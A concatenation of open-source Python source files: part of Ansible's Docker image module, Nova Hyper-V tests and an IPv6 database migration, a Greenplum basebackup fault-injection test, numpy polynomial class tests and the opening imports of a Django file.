if not self.check_mode:
status = None
try:
for line in self.client.push(repository, tag=tag, stream=True, decode=True):
self.log(line, pretty_print=True)
if line.get('errorDetail'):
raise Exception(line['errorDetail']['message'])
status = line.get('status')
except Exception as exc:
if re.search('unauthorized', str(exc)):
if re.search('authentication required', str(exc)):
self.fail("Error pushing image %s/%s:%s - %s. Try logging into %s first." %
(registry, repo_name, tag, str(exc), registry))
else:
self.fail("Error pushing image %s/%s:%s - %s. Does the repository exist?" %
(registry, repo_name, tag, str(exc)))
self.fail("Error pushing image %s: %s" % (repository, str(exc)))
self.results['image'] = self.client.find_image(name=repository, tag=tag)
if not self.results['image']:
self.results['image'] = dict()
self.results['image']['push_status'] = status
def tag_image(self, name, tag, repository, force=False, push=False):
'''
Tag an image into a repository.
:param name: name of the image. required.
:param tag: image tag.
:param repository: path to the repository. required.
:param force: bool. force tagging, even it image already exists with the repository path.
:param push: bool. push the image once it's tagged.
:return: None
'''
repo, repo_tag = parse_repository_tag(repository)
if not repo_tag:
repo_tag = "latest"
if tag:
repo_tag = tag
image = self.client.find_image(name=repo, tag=repo_tag)
found = 'found' if image else 'not found'
self.log("image %s was %s" % (repo, found))
if not image or force:
self.log("tagging %s:%s to %s:%s" % (name, tag, repo, repo_tag))
self.results['changed'] = True
self.results['actions'].append("Tagged image %s:%s to %s:%s" % (name, tag, repo, repo_tag))
if not self.check_mode:
try:
# Finding the image does not always work, especially running a localhost registry. In those
# cases, if we don't set force=True, it errors.
image_name = name
if tag and not re.search(tag, name):
image_name = "%s:%s" % (name, tag)
tag_status = self.client.tag(image_name, repo, tag=repo_tag, force=True)
if not tag_status:
raise Exception("Tag operation failed.")
except Exception as exc:
self.fail("Error: failed to tag image - %s" % str(exc))
self.results['image'] = self.client.find_image(name=repo, tag=repo_tag)
if push:
self.push_image(repo, repo_tag)
def build_image(self):
'''
Build an image
:return: image dict
'''
params = dict(
path=self.path,
tag=self.name,
rm=self.rm,
nocache=self.nocache,
stream=True,
timeout=self.http_timeout,
pull=self.pull,
forcerm=self.rm,
dockerfile=self.dockerfile,
decode=True
)
if self.tag:
params['tag'] = "%s:%s" % (self.name, self.tag)
if self.container_limits:
params['container_limits'] = self.container_limits
if self.buildargs:
for key, value in self.buildargs.items():
if not isinstance(value, basestring):
self.buildargs[key] = str(value)
params['buildargs'] = self.buildargs
for line in self.client.build(**params):
# line = json.loads(line)
self.log(line, pretty_print=True)
if line.get('error'):
if line.get('errorDetail'):
errorDetail = line.get('errorDetail')
self.fail("Error building %s - code: %s message: %s" % (self.name,
errorDetail.get('code'),
errorDetail.get('message')))
else:
self.fail("Error building %s - %s" % (self.name, line.get('error')))
return self.client.find_image(name=self.name, tag=self.tag)
def load_image(self):
'''
Load an image from a .tar archive
:return: image dict
'''
try:
self.log("Opening image %s" % self.load_path)
image_tar = open(self.load_path, 'r')
except Exception as exc:
self.fail("Error opening image %s - %s" % (self.load_path, str(exc)))
try:
self.log("Loading image from %s" % self.load_path)
self.client.load_image(image_tar)
except Exception as exc:
self.fail("Error loading image %s - %s" % (self.name, str(exc)))
try:
image_tar.close()
except Exception as exc:
self.fail("Error closing image %s - %s" % (self.name, str(exc)))
return self.client.find_image(self.name, self.tag)
def main():
argument_spec = dict(
archive_path=dict(type='path'),
container_limits=dict(type='dict'),
dockerfile=dict(type='str'),
force=dict(type='bool', default=False),
http_timeout=dict(type='int'),
load_path=dict(type='path'),
name=dict(type='str', required=True),
nocache=dict(type='str', default=False),
path=dict(type='path', aliases=['build_path']),
pull=dict(type='bool', default=True),
push=dict(type='bool', default=False),
repository=dict(type='str'),
rm=dict(type='bool', default=True),
state=dict(type='str', choices=['absent', 'present', 'build'], default='present'),
tag=dict(type='str', default='latest'),
use_tls=dict(type='str', default='no', choices=['no', 'encrypt', 'verify']),
buildargs=dict(type='dict', default=None),
)
client = AnsibleDockerClient(
argument_spec=argument_spec,
supports_check_mode=True,
)
results = dict(
changed=False,
actions=[],
image={}
)
ImageManager(client, results)
client.module.exit_json(**results)
# import module snippets
from ansible.module_utils.basic import *
if __name__ == '__main__':
main()
| ColOfAbRiX/ansible | lib/ansible/modules/cloud/docker/docker_image.py | Python | gpl-3.0 | 21,614 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 Cloudbase Solutions Srl
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from nova import test
from nova.virt.hyperv import vmutils
class VMUtilsTestCase(test.NoDBTestCase):
"""Unit tests for the Hyper-V VMUtils class."""
_FAKE_VM_NAME = 'fake_vm'
_FAKE_MEMORY_MB = 2
_FAKE_VM_PATH = "fake_vm_path"
def setUp(self):
self._vmutils = vmutils.VMUtils()
self._vmutils._conn = mock.MagicMock()
super(VMUtilsTestCase, self).setUp()
def test_enable_vm_metrics_collection(self):
self.assertRaises(NotImplementedError,
self._vmutils.enable_vm_metrics_collection,
self._FAKE_VM_NAME)
def _lookup_vm(self):
mock_vm = mock.MagicMock()
self._vmutils._lookup_vm_check = mock.MagicMock(
return_value=mock_vm)
mock_vm.path_.return_value = self._FAKE_VM_PATH
return mock_vm
def test_set_vm_memory_static(self):
self._test_set_vm_memory_dynamic(1.0)
def test_set_vm_memory_dynamic(self):
self._test_set_vm_memory_dynamic(2.0)
def _test_set_vm_memory_dynamic(self, dynamic_memory_ratio):
mock_vm = self._lookup_vm()
mock_s = self._vmutils._conn.Msvm_VirtualSystemSettingData()[0]
mock_s.SystemType = 3
mock_vmsetting = mock.MagicMock()
mock_vmsetting.associators.return_value = [mock_s]
self._vmutils._modify_virt_resource = mock.MagicMock()
self._vmutils._set_vm_memory(mock_vm, mock_vmsetting,
self._FAKE_MEMORY_MB,
dynamic_memory_ratio)
self._vmutils._modify_virt_resource.assert_called_with(
mock_s, self._FAKE_VM_PATH)
if dynamic_memory_ratio > 1:
self.assertTrue(mock_s.DynamicMemoryEnabled)
else:
self.assertFalse(mock_s.DynamicMemoryEnabled)
| ntt-sic/nova | nova/tests/virt/hyperv/test_vmutils.py | Python | apache-2.0 | 2,546 |
# Copyright 2011 OpenStack LLC
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from sqlalchemy import Column, Integer, MetaData, String, Table
meta = MetaData()
# Table stub-definitions
# Just for the ForeignKey and column creation to succeed, these are not the
# actual definitions of instances or services.
#
fixed_ips = Table(
"fixed_ips",
meta,
Column(
"id",
Integer(),
primary_key=True,
nullable=False))
#
# New Tables
#
# None
#
# Tables to alter
#
# None
#
# Columns to add to existing tables
#
fixed_ips_addressV6 = Column(
"addressV6",
String(
length=255,
convert_unicode=False,
assert_unicode=None,
unicode_error=None,
_warn_on_bytestring=False))
fixed_ips_netmaskV6 = Column(
"netmaskV6",
String(
length=3,
convert_unicode=False,
assert_unicode=None,
unicode_error=None,
_warn_on_bytestring=False))
fixed_ips_gatewayV6 = Column(
"gatewayV6",
String(
length=255,
convert_unicode=False,
assert_unicode=None,
unicode_error=None,
_warn_on_bytestring=False))
def upgrade(migrate_engine):
# Upgrade operations go here. Don't create your own engine;
# bind migrate_engine to your metadata
meta.bind = migrate_engine
# Add columns to existing tables
fixed_ips.create_column(fixed_ips_addressV6)
fixed_ips.create_column(fixed_ips_netmaskV6)
fixed_ips.create_column(fixed_ips_gatewayV6)
| nii-cloud/dodai-compute | nova/db/sqlalchemy/migrate_repo/versions/007_add_ipv6_to_fixed_ips.py | Python | apache-2.0 | 2,067 |
#!/usr/bin/env python
"""
Copyright (c) 2004-Present Pivotal Software, Inc.
This program and the accompanying materials are made available under
the terms of the under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from gppylib.commands.base import Command
from gppylib.db import dbconn
from tinctest import logger
from mpp.lib.PSQL import PSQL
from mpp.models import MPPTestCase
from mpp.gpdb.tests.storage.walrepl import lib as walrepl
import mpp.gpdb.tests.storage.walrepl.run
import os
import shutil
import subprocess
class basebackup_cases(mpp.gpdb.tests.storage.walrepl.run.StandbyRunMixin, MPPTestCase):
def tearDown(self):
super(basebackup_cases, self).tearDown()
self.reset_fault('base_backup_post_create_checkpoint')
def run_gpfaultinjector(self, fault_type, fault_name):
cmd_str = 'gpfaultinjector -s 1 -y {0} -f {1}'.format(
fault_type, fault_name)
cmd = Command(cmd_str, cmd_str)
cmd.run()
return cmd.get_results()
def resume(self, fault_name):
return self.run_gpfaultinjector('resume', fault_name)
def suspend_at(self, fault_name):
return self.run_gpfaultinjector('suspend', fault_name)
def reset_fault(self, fault_name):
return self.run_gpfaultinjector('reset', fault_name)
def fault_status(self, fault_name):
return self.run_gpfaultinjector('status', fault_name)
def wait_triggered(self, fault_name):
search = "fault injection state:'triggered'"
for i in walrepl.polling(10, 3):
result = self.fault_status(fault_name)
stdout = result.stdout
if stdout.find(search) > 0:
return True
return False
def test_xlogcleanup(self):
"""
Test for verifying if xlog seg created while basebackup
dumps out data does not get cleaned
"""
shutil.rmtree('base', True)
PSQL.run_sql_command('DROP table if exists foo')
# Inject fault at post checkpoint create (basebackup)
logger.info ('Injecting base_backup_post_create_checkpoint fault ...')
result = self.suspend_at(
'base_backup_post_create_checkpoint')
logger.info(result.stdout)
self.assertEqual(result.rc, 0, result.stdout)
# Now execute basebackup. It will be blocked due to the
# injected fault.
logger.info ('Perform basebackup with xlog & recovery.conf...')
pg_basebackup = subprocess.Popen(['pg_basebackup', '-x', '-R', '-D', 'base']
, stdout = subprocess.PIPE
, stderr = subprocess.PIPE)
# Give basebackup a moment to reach the fault &
# trigger it
logger.info('Check if suspend fault is hit ...')
triggered = self.wait_triggered(
'base_backup_post_create_checkpoint')
self.assertTrue(triggered, 'Fault was not triggered')
# Perform operations that causes xlog seg generation
logger.info ('Performing xlog seg generation ...')
count = 0
while (count < 10):
PSQL.run_sql_command('select pg_switch_xlog(); select pg_switch_xlog(); checkpoint;')
count = count + 1
# Resume basebackup
result = self.resume('base_backup_post_create_checkpoint')
logger.info(result.stdout)
self.assertEqual(result.rc, 0, result.stdout)
# Wait until basebackup end
logger.info('Waiting for basebackup to end ...')
sql = "SELECT count(*) FROM pg_stat_replication"
with dbconn.connect(dbconn.DbURL(), utility=True) as conn:
while (True):
curs = dbconn.execSQL(conn, sql)
results = curs.fetchall()
if (int(results[0][0]) == 0):
break;
# Verify if basebackup completed successfully
# See if recovery.conf exists (Yes - Pass)
self.assertTrue(os.path.exists(os.path.join('base','recovery.conf')))
logger.info ('Found recovery.conf in the backup directory.')
logger.info ('Pass')
| edespino/gpdb | src/test/tinc/tincrepo/mpp/gpdb/tests/storage/walrepl/basebackup/test_xlog_cleanup.py | Python | apache-2.0 | 4,635 |
"""Test inter-conversion of different polynomial classes.
This tests the convert and cast methods of all the polynomial classes.
"""
import operator as op
from numbers import Number
import pytest
import numpy as np
from numpy.polynomial import (
Polynomial, Legendre, Chebyshev, Laguerre, Hermite, HermiteE)
from numpy.testing import (
assert_almost_equal, assert_raises, assert_equal, assert_,
)
from numpy.polynomial.polyutils import RankWarning
#
# fixtures
#
classes = (
Polynomial, Legendre, Chebyshev, Laguerre,
Hermite, HermiteE
)
classids = tuple(cls.__name__ for cls in classes)
@pytest.fixture(params=classes, ids=classids)
def Poly(request):
return request.param
#
# helper functions
#
random = np.random.random
def assert_poly_almost_equal(p1, p2, msg=""):
try:
assert_(np.all(p1.domain == p2.domain))
assert_(np.all(p1.window == p2.window))
assert_almost_equal(p1.coef, p2.coef)
except AssertionError:
msg = f"Result: {p1}\nTarget: {p2}"
raise AssertionError(msg)
#
# Test conversion methods that depend on combinations of two classes.
#
Poly1 = Poly
Poly2 = Poly
def test_conversion(Poly1, Poly2):
x = np.linspace(0, 1, 10)
coef = random((3,))
d1 = Poly1.domain + random((2,))*.25
w1 = Poly1.window + random((2,))*.25
p1 = Poly1(coef, domain=d1, window=w1)
d2 = Poly2.domain + random((2,))*.25
w2 = Poly2.window + random((2,))*.25
p2 = p1.convert(kind=Poly2, domain=d2, window=w2)
assert_almost_equal(p2.domain, d2)
assert_almost_equal(p2.window, w2)
assert_almost_equal(p2(x), p1(x))
def test_cast(Poly1, Poly2):
x = np.linspace(0, 1, 10)
coef = random((3,))
d1 = Poly1.domain + random((2,))*.25
w1 = Poly1.window + random((2,))*.25
p1 = Poly1(coef, domain=d1, window=w1)
d2 = Poly2.domain + random((2,))*.25
w2 = Poly2.window + random((2,))*.25
p2 = Poly2.cast(p1, domain=d2, window=w2)
assert_almost_equal(p2.domain, d2)
assert_almost_equal(p2.window, w2)
assert_almost_equal(p2(x), p1(x))
#
# test methods that depend on one class
#
def test_identity(Poly):
d = Poly.domain + random((2,))*.25
w = Poly.window + random((2,))*.25
x = np.linspace(d[0], d[1], 11)
p = Poly.identity(domain=d, window=w)
assert_equal(p.domain, d)
assert_equal(p.window, w)
assert_almost_equal(p(x), x)
def test_basis(Poly):
d = Poly.domain + random((2,))*.25
w = Poly.window + random((2,))*.25
p = Poly.basis(5, domain=d, window=w)
assert_equal(p.domain, d)
assert_equal(p.window, w)
assert_equal(p.coef, [0]*5 + [1])
def test_fromroots(Poly):
# check that requested roots are zeros of a polynomial
# of correct degree, domain, and window.
d = Poly.domain + random((2,))*.25
w = Poly.window + random((2,))*.25
r = random((5,))
p1 = Poly.fromroots(r, domain=d, window=w)
assert_equal(p1.degree(), len(r))
assert_equal(p1.domain, d)
assert_equal(p1.window, w)
assert_almost_equal(p1(r), 0)
# check that polynomial is monic
pdom = Polynomial.domain
pwin = Polynomial.window
p2 = Polynomial.cast(p1, domain=pdom, window=pwin)
assert_almost_equal(p2.coef[-1], 1)
def test_bad_conditioned_fit(Poly):
x = [0., 0., 1.]
y = [1., 2., 3.]
# check RankWarning is raised
with pytest.warns(RankWarning) as record:
Poly.fit(x, y, 2)
assert record[0].message.args[0] == "The fit may be poorly conditioned"
def test_fit(Poly):
def f(x):
return x*(x - 1)*(x - 2)
x = np.linspace(0, 3)
y = f(x)
# check default value of domain and window
p = Poly.fit(x, y, 3)
assert_almost_equal(p.domain, [0, 3])
assert_almost_equal(p(x), y)
assert_equal(p.degree(), 3)
# check with given domains and window
d = Poly.domain + random((2,))*.25
w = Poly.window + random((2,))*.25
p = Poly.fit(x, y, 3, domain=d, window=w)
assert_almost_equal(p(x), y)
assert_almost_equal(p.domain, d)
assert_almost_equal(p.window, w)
p = Poly.fit(x, y, [0, 1, 2, 3], domain=d, window=w)
assert_almost_equal(p(x), y)
assert_almost_equal(p.domain, d)
assert_almost_equal(p.window, w)
# check with class domain default
p = Poly.fit(x, y, 3, [])
assert_equal(p.domain, Poly.domain)
assert_equal(p.window, Poly.window)
p = Poly.fit(x, y, [0, 1, 2, 3], [])
assert_equal(p.domain, Poly.domain)
assert_equal(p.window, Poly.window)
# check that fit accepts weights.
w = np.zeros_like(x)
z = y + random(y.shape)*.25
w[::2] = 1
p1 = Poly.fit(x[::2], z[::2], 3)
p2 = Poly.fit(x, z, 3, w=w)
p3 = Poly.fit(x, z, [0, 1, 2, 3], w=w)
assert_almost_equal(p1(x), p2(x))
assert_almost_equal(p2(x), p3(x))
def test_equal(Poly):
p1 = Poly([1, 2, 3], domain=[0, 1], window=[2, 3])
p2 = Poly([1, 1, 1], domain=[0, 1], window=[2, 3])
p3 = Poly([1, 2, 3], domain=[1, 2], window=[2, 3])
p4 = Poly([1, 2, 3], domain=[0, 1], window=[1, 2])
assert_(p1 == p1)
assert_(not p1 == p2)
assert_(not p1 == p3)
assert_(not p1 == p4)
def test_not_equal(Poly):
p1 = Poly([1, 2, 3], domain=[0, 1], window=[2, 3])
p2 = Poly([1, 1, 1], domain=[0, 1], window=[2, 3])
p3 = Poly([1, 2, 3], domain=[1, 2], window=[2, 3])
p4 = Poly([1, 2, 3], domain=[0, 1], window=[1, 2])
assert_(not p1 != p1)
assert_(p1 != p2)
assert_(p1 != p3)
assert_(p1 != p4)
def test_add(Poly):
# This checks commutation, not numerical correctness
c1 = list(random((4,)) + .5)
c2 = list(random((3,)) + .5)
p1 = Poly(c1)
p2 = Poly(c2)
p3 = p1 + p2
assert_poly_almost_equal(p2 + p1, p3)
assert_poly_almost_equal(p1 + c2, p3)
assert_poly_almost_equal(c2 + p1, p3)
assert_poly_almost_equal(p1 + tuple(c2), p3)
assert_poly_almost_equal(tuple(c2) + p1, p3)
assert_poly_almost_equal(p1 + np.array(c2), p3)
assert_poly_almost_equal(np.array(c2) + p1, p3)
assert_raises(TypeError, op.add, p1, Poly([0], domain=Poly.domain + 1))
assert_raises(TypeError, op.add, p1, Poly([0], window=Poly.window + 1))
if Poly is Polynomial:
assert_raises(TypeError, op.add, p1, Chebyshev([0]))
else:
assert_raises(TypeError, op.add, p1, Polynomial([0]))
def test_sub(Poly):
# This checks commutation, not numerical correctness
c1 = list(random((4,)) + .5)
c2 = list(random((3,)) + .5)
p1 = Poly(c1)
p2 = Poly(c2)
p3 = p1 - p2
assert_poly_almost_equal(p2 - p1, -p3)
assert_poly_almost_equal(p1 - c2, p3)
assert_poly_almost_equal(c2 - p1, -p3)
assert_poly_almost_equal(p1 - tuple(c2), p3)
assert_poly_almost_equal(tuple(c2) - p1, -p3)
assert_poly_almost_equal(p1 - np.array(c2), p3)
assert_poly_almost_equal(np.array(c2) - p1, -p3)
assert_raises(TypeError, op.sub, p1, Poly([0], domain=Poly.domain + 1))
assert_raises(TypeError, op.sub, p1, Poly([0], window=Poly.window + 1))
if Poly is Polynomial:
assert_raises(TypeError, op.sub, p1, Chebyshev([0]))
else:
assert_raises(TypeError, op.sub, p1, Polynomial([0]))
def test_mul(Poly):
c1 = list(random((4,)) + .5)
c2 = list(random((3,)) + .5)
p1 = Poly(c1)
p2 = Poly(c2)
p3 = p1 * p2
assert_poly_almost_equal(p2 * p1, p3)
assert_poly_almost_equal(p1 * c2, p3)
assert_poly_almost_equal(c2 * p1, p3)
assert_poly_almost_equal(p1 * tuple(c2), p3)
assert_poly_almost_equal(tuple(c2) * p1, p3)
assert_poly_almost_equal(p1 * np.array(c2), p3)
assert_poly_almost_equal(np.array(c2) * p1, p3)
assert_poly_almost_equal(p1 * 2, p1 * Poly([2]))
assert_poly_almost_equal(2 * p1, p1 * Poly([2]))
assert_raises(TypeError, op.mul, p1, Poly([0], domain=Poly.domain + 1))
assert_raises(TypeError, op.mul, p1, Poly([0], window=Poly.window + 1))
if Poly is Polynomial:
assert_raises(TypeError, op.mul, p1, Chebyshev([0]))
else:
assert_raises(TypeError, op.mul, p1, Polynomial([0]))
def test_floordiv(Poly):
c1 = list(random((4,)) + .5)
c2 = list(random((3,)) + .5)
c3 = list(random((2,)) + .5)
p1 = Poly(c1)
p2 = Poly(c2)
p3 = Poly(c3)
p4 = p1 * p2 + p3
c4 = list(p4.coef)
assert_poly_almost_equal(p4 // p2, p1)
assert_poly_almost_equal(p4 // c2, p1)
assert_poly_almost_equal(c4 // p2, p1)
assert_poly_almost_equal(p4 // tuple(c2), p1)
assert_poly_almost_equal(tuple(c4) // p2, p1)
assert_poly_almost_equal(p4 // np.array(c2), p1)
assert_poly_almost_equal(np.array(c4) // p2, p1)
assert_poly_almost_equal(2 // p2, Poly([0]))
assert_poly_almost_equal(p2 // 2, 0.5*p2)
assert_raises(
TypeError, op.floordiv, p1, Poly([0], domain=Poly.domain + 1))
assert_raises(
TypeError, op.floordiv, p1, Poly([0], window=Poly.window + 1))
if Poly is Polynomial:
assert_raises(TypeError, op.floordiv, p1, Chebyshev([0]))
else:
assert_raises(TypeError, op.floordiv, p1, Polynomial([0]))
def test_truediv(Poly):
# true division is valid only if the denominator is a Number and
# not a python bool.
p1 = Poly([1,2,3])
p2 = p1 * 5
for stype in np.ScalarType:
if not issubclass(stype, Number) or issubclass(stype, bool):
continue
s = stype(5)
assert_poly_almost_equal(op.truediv(p2, s), p1)
assert_raises(TypeError, op.truediv, s, p2)
for stype in (int, float):
s = stype(5)
assert_poly_almost_equal(op.truediv(p2, s), p1)
assert_raises(TypeError, op.truediv, s, p2)
for stype in [complex]:
s = stype(5, 0)
assert_poly_almost_equal(op.truediv(p2, s), p1)
assert_raises(TypeError, op.truediv, s, p2)
for s in [tuple(), list(), dict(), bool(), np.array([1])]:
assert_raises(TypeError, op.truediv, p2, s)
assert_raises(TypeError, op.truediv, s, p2)
for ptype in classes:
assert_raises(TypeError, op.truediv, p2, ptype(1))
def test_mod(Poly):
# This checks commutation, not numerical correctness
c1 = list(random((4,)) + .5)
c2 = list(random((3,)) + .5)
c3 = list(random((2,)) + .5)
p1 = Poly(c1)
p2 = Poly(c2)
p3 = Poly(c3)
p4 = p1 * p2 + p3
c4 = list(p4.coef)
assert_poly_almost_equal(p4 % p2, p3)
assert_poly_almost_equal(p4 % c2, p3)
assert_poly_almost_equal(c4 % p2, p3)
assert_poly_almost_equal(p4 % tuple(c2), p3)
assert_poly_almost_equal(tuple(c4) % p2, p3)
assert_poly_almost_equal(p4 % np.array(c2), p3)
assert_poly_almost_equal(np.array(c4) % p2, p3)
assert_poly_almost_equal(2 % p2, Poly([2]))
assert_poly_almost_equal(p2 % 2, Poly([0]))
assert_raises(TypeError, op.mod, p1, Poly([0], domain=Poly.domain + 1))
assert_raises(TypeError, op.mod, p1, Poly([0], window=Poly.window + 1))
if Poly is Polynomial:
assert_raises(TypeError, op.mod, p1, Chebyshev([0]))
else:
assert_raises(TypeError, op.mod, p1, Polynomial([0]))
def test_divmod(Poly):
# This checks commutation, not numerical correctness
c1 = list(random((4,)) + .5)
c2 = list(random((3,)) + .5)
c3 = list(random((2,)) + .5)
p1 = Poly(c1)
p2 = Poly(c2)
p3 = Poly(c3)
p4 = p1 * p2 + p3
c4 = list(p4.coef)
quo, rem = divmod(p4, p2)
assert_poly_almost_equal(quo, p1)
assert_poly_almost_equal(rem, p3)
quo, rem = divmod(p4, c2)
assert_poly_almost_equal(quo, p1)
assert_poly_almost_equal(rem, p3)
quo, rem = divmod(c4, p2)
assert_poly_almost_equal(quo, p1)
assert_poly_almost_equal(rem, p3)
quo, rem = divmod(p4, tuple(c2))
assert_poly_almost_equal(quo, p1)
assert_poly_almost_equal(rem, p3)
quo, rem = divmod(tuple(c4), p2)
assert_poly_almost_equal(quo, p1)
assert_poly_almost_equal(rem, p3)
quo, rem = divmod(p4, np.array(c2))
assert_poly_almost_equal(quo, p1)
assert_poly_almost_equal(rem, p3)
quo, rem = divmod(np.array(c4), p2)
assert_poly_almost_equal(quo, p1)
assert_poly_almost_equal(rem, p3)
quo, rem = divmod(p2, 2)
assert_poly_almost_equal(quo, 0.5*p2)
assert_poly_almost_equal(rem, Poly([0]))
quo, rem = divmod(2, p2)
assert_poly_almost_equal(quo, Poly([0]))
assert_poly_almost_equal(rem, Poly([2]))
assert_raises(TypeError, divmod, p1, Poly([0], domain=Poly.domain + 1))
assert_raises(TypeError, divmod, p1, Poly([0], window=Poly.window + 1))
if Poly is Polynomial:
assert_raises(TypeError, divmod, p1, Chebyshev([0]))
else:
assert_raises(TypeError, divmod, p1, Polynomial([0]))
def test_roots(Poly):
d = Poly.domain * 1.25 + .25
w = Poly.window
tgt = np.linspace(d[0], d[1], 5)
res = np.sort(Poly.fromroots(tgt, domain=d, window=w).roots())
assert_almost_equal(res, tgt)
# default domain and window
res = np.sort(Poly.fromroots(tgt).roots())
assert_almost_equal(res, tgt)
def test_degree(Poly):
p = Poly.basis(5)
assert_equal(p.degree(), 5)
def test_copy(Poly):
p1 = Poly.basis(5)
p2 = p1.copy()
assert_(p1 == p2)
assert_(p1 is not p2)
assert_(p1.coef is not p2.coef)
assert_(p1.domain is not p2.domain)
assert_(p1.window is not p2.window)
def test_integ(Poly):
P = Polynomial
# Check defaults
p0 = Poly.cast(P([1*2, 2*3, 3*4]))
p1 = P.cast(p0.integ())
p2 = P.cast(p0.integ(2))
assert_poly_almost_equal(p1, P([0, 2, 3, 4]))
assert_poly_almost_equal(p2, P([0, 0, 1, 1, 1]))
# Check with k
p0 = Poly.cast(P([1*2, 2*3, 3*4]))
p1 = P.cast(p0.integ(k=1))
p2 = P.cast(p0.integ(2, k=[1, 1]))
assert_poly_almost_equal(p1, P([1, 2, 3, 4]))
assert_poly_almost_equal(p2, P([1, 1, 1, 1, 1]))
# Check with lbnd
p0 = Poly.cast(P([1*2, 2*3, 3*4]))
p1 = P.cast(p0.integ(lbnd=1))
p2 = P.cast(p0.integ(2, lbnd=1))
assert_poly_almost_equal(p1, P([-9, 2, 3, 4]))
assert_poly_almost_equal(p2, P([6, -9, 1, 1, 1]))
# Check scaling
d = 2*Poly.domain
p0 = Poly.cast(P([1*2, 2*3, 3*4]), domain=d)
p1 = P.cast(p0.integ())
p2 = P.cast(p0.integ(2))
assert_poly_almost_equal(p1, P([0, 2, 3, 4]))
assert_poly_almost_equal(p2, P([0, 0, 1, 1, 1]))
def test_deriv(Poly):
# Check that the derivative is the inverse of integration. It is
# assumes that the integration has been checked elsewhere.
d = Poly.domain + random((2,))*.25
w = Poly.window + random((2,))*.25
p1 = Poly([1, 2, 3], domain=d, window=w)
p2 = p1.integ(2, k=[1, 2])
p3 = p1.integ(1, k=[1])
assert_almost_equal(p2.deriv(1).coef, p3.coef)
assert_almost_equal(p2.deriv(2).coef, p1.coef)
# default domain and window
p1 = Poly([1, 2, 3])
p2 = p1.integ(2, k=[1, 2])
p3 = p1.integ(1, k=[1])
assert_almost_equal(p2.deriv(1).coef, p3.coef)
assert_almost_equal(p2.deriv(2).coef, p1.coef)
def test_linspace(Poly):
d = Poly.domain + random((2,))*.25
w = Poly.window + random((2,))*.25
p = Poly([1, 2, 3], domain=d, window=w)
# check default domain
xtgt = np.linspace(d[0], d[1], 20)
ytgt = p(xtgt)
xres, yres = p.linspace(20)
assert_almost_equal(xres, xtgt)
assert_almost_equal(yres, ytgt)
# check specified domain
xtgt = np.linspace(0, 2, 20)
ytgt = p(xtgt)
xres, yres = p.linspace(20, domain=[0, 2])
assert_almost_equal(xres, xtgt)
assert_almost_equal(yres, ytgt)
def test_pow(Poly):
d = Poly.domain + random((2,))*.25
w = Poly.window + random((2,))*.25
tgt = Poly([1], domain=d, window=w)
tst = Poly([1, 2, 3], domain=d, window=w)
for i in range(5):
assert_poly_almost_equal(tst**i, tgt)
tgt = tgt * tst
# default domain and window
tgt = Poly([1])
tst = Poly([1, 2, 3])
for i in range(5):
assert_poly_almost_equal(tst**i, tgt)
tgt = tgt * tst
# check error for invalid powers
assert_raises(ValueError, op.pow, tgt, 1.5)
assert_raises(ValueError, op.pow, tgt, -1)
def test_call(Poly):
P = Polynomial
d = Poly.domain
x = np.linspace(d[0], d[1], 11)
# Check defaults
p = Poly.cast(P([1, 2, 3]))
tgt = 1 + x*(2 + 3*x)
res = p(x)
assert_almost_equal(res, tgt)
def test_cutdeg(Poly):
p = Poly([1, 2, 3])
assert_raises(ValueError, p.cutdeg, .5)
assert_raises(ValueError, p.cutdeg, -1)
assert_equal(len(p.cutdeg(3)), 3)
assert_equal(len(p.cutdeg(2)), 3)
assert_equal(len(p.cutdeg(1)), 2)
assert_equal(len(p.cutdeg(0)), 1)
def test_truncate(Poly):
p = Poly([1, 2, 3])
assert_raises(ValueError, p.truncate, .5)
assert_raises(ValueError, p.truncate, 0)
assert_equal(len(p.truncate(4)), 3)
assert_equal(len(p.truncate(3)), 3)
assert_equal(len(p.truncate(2)), 2)
assert_equal(len(p.truncate(1)), 1)
def test_trim(Poly):
c = [1, 1e-6, 1e-12, 0]
p = Poly(c)
assert_equal(p.trim().coef, c[:3])
assert_equal(p.trim(1e-10).coef, c[:2])
assert_equal(p.trim(1e-5).coef, c[:1])
def test_mapparms(Poly):
# check with defaults. Should be identity.
d = Poly.domain
w = Poly.window
p = Poly([1], domain=d, window=w)
assert_almost_equal([0, 1], p.mapparms())
#
w = 2*d + 1
p = Poly([1], domain=d, window=w)
assert_almost_equal([1, 2], p.mapparms())
def test_ufunc_override(Poly):
p = Poly([1, 2, 3])
x = np.ones(3)
assert_raises(TypeError, np.add, p, x)
assert_raises(TypeError, np.add, x, p)
#
# Test class method that only exists for some classes
#
class TestInterpolate:
def f(self, x):
return x * (x - 1) * (x - 2)
def test_raises(self):
assert_raises(ValueError, Chebyshev.interpolate, self.f, -1)
assert_raises(TypeError, Chebyshev.interpolate, self.f, 10.)
def test_dimensions(self):
for deg in range(1, 5):
assert_(Chebyshev.interpolate(self.f, deg).degree() == deg)
def test_approximation(self):
def powx(x, p):
return x**p
x = np.linspace(0, 2, 10)
for deg in range(0, 10):
for t in range(0, deg + 1):
p = Chebyshev.interpolate(powx, deg, domain=[0, 2], args=(t,))
assert_almost_equal(p(x), powx(x, t), decimal=11)
| anntzer/numpy | numpy/polynomial/tests/test_classes.py | Python | bsd-3-clause | 18,331 |
from django.conf.global_settings import PASSWORD_HASHERS
from django.contrib.auth import get_user_model
from django.contrib.auth.hashers import get_hasher
